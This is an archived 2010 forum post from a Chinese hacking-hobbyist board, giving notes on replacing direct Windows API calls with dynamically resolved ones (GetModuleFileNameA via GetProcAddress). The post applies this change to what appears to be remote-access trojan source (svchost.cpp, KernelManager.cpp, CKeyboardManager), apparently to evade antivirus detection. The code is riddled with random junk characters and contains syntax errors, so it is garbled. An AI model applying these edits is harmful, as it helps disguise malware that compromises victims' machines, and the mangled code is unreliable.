【3.A.S.T】网络安全爱好者's Archiver

黑客学习

ice_xke 发表于 2010-10-19 12:30

全局动态调用

全局动态调用笔记FkLQ/o
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h!PZ#Q:{T&gyD
----------------------------------------7Ff3@5O+Ros&P
DTDY.h:h;T`6n5\
,rQ%MJ T?K
#if _MSC_VER>1000
F suH)x}2M #pragma once
H!` Bomw? #endif //_MSC_VER>1000
lIr&AhR i%Wl:EG #include<windows.h>
S$a B)yN4{o
2U}CF"FpG typedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);3Am!t,q;Z!O2vY5s
class DTDYi {6^-n5ht'B
{'KMgle d
public:5g3rC\K6R`F
DTDY();
ss"gB"Q]~ virtual ~DTDY();
'k_^z(K public:
u9fAbA*rw'W)[ static pGetModuleFileNameA MyGetModuleFileName;
0hV1_9T[;^ static BOOL FunInitiallization();"El}Yb4fR)@/VI
};
vu[-~vT0x6b&m #endif
pY#uO;YncpJp6S ----------------------------------------1Q9`+R-M&IB:r

f r^*|~X(gl DTDY.cpp:
ve4tj1U%J7A$x
AM ut^5a? #include "DTDY.h"Um!{%Np7c3{M
pGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;lc WrJ.~J:v`
DTDY:TDY()
;m7B,G i9W9wF {
urSq&xYU;@ }~JnR(o.CB/[1|:X1I9w
DTDY::~DTDY()/he@1b'U7NH
{!z5[X6\1c's C~K!s
}"k6{bsYoo
BOOL DTDY::FunInitiallization()
$G f `&I-B'I#vS {
t5l@ B,`5KK$CcE&Ug HMODULE hModule=LoadLibrary("kernel32.dll");D4_1Ss$y"C P.nr
MyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
gZ5{,x,KDu S{\ if(!MyGetModuleFileName=) return FALSE;oBQgY|%sF

4] O,Gm4\+h1~ return TRUE;.~.K-@l:\] o'?5D
}
$U&]A:],^4iz7{ ----------------------------------------K8PzGK2MM;A6p"S
svchost.cpp:
uVp-C,h&h .a&S*ZP|"j:k9Ui&m
#include "DTDY.h"qDL_8s+Q)\#f2` N
/Z\q5M6E!~WN&t
BOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)Xf;@cUy)X
{f,l^!hZ;M ^*gUJ
switch(ul_reason_for_call)
Q gfqcNf1h6S1Y*[B {*U2HT0? s1Z2hx
case DLL_PROCESS_ATTACH:
a+M6V1S?5T7gD~ if(!DTDY::FunInitiallization()) return FALSE;"d6I"?8Gq+O%i!o1~o

F3T_NS$D break;}ALE8F4p
}2JO&gIlP$r2DBW3_Q
}
HR*@pF3[ L^&Y{#@'L
K4P)tK;?b] j
/M8u?!W:G,X:Y L GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def
It'dIW3T!r` J 改写为7l+Vr+wZ7z[
DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));M(P5f T0Q'O5U'l#~`
----------------------------------------
Oxh%mS7Y(b%UD KernelManager.cpp:
@ Z9[{M'J+z e "{/B+InMz
#include "../DTDY.h"
n)A*F-YL/\ GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));!\` zLp M!m.}
改写为
Z'k LCk1d DTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
"OYL2I;lSfM[w n ----------------------------------------

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.